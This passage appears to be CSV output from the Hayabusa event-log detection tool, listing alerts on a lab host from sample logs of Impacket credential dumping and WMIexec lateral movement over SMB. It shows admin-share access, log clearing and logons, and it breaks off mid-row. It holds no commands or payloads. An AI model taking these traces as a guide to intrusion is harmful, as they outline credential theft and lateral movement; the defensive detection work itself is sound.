10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret 
dump via SMB.evtx" +2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63558 : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63534 : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 50896 : LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 56740 : LogonID: 
0x189f62,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.483 +09:00,fs03vuln.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution 
via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.546 +09:00,fs03vuln.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: 
__1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : 
Workstation: : IP Address: 10.23.23.9 : Port: 63564 : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : 
LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63564 : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\DesktopTileResources\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.321 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Downloaded Program Files\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ImmersiveControlPanel\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\media\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Offline Web Pages\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ToastData\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ar : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\bg : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\cs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\da : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\de : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\el : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\en : IP Address: 
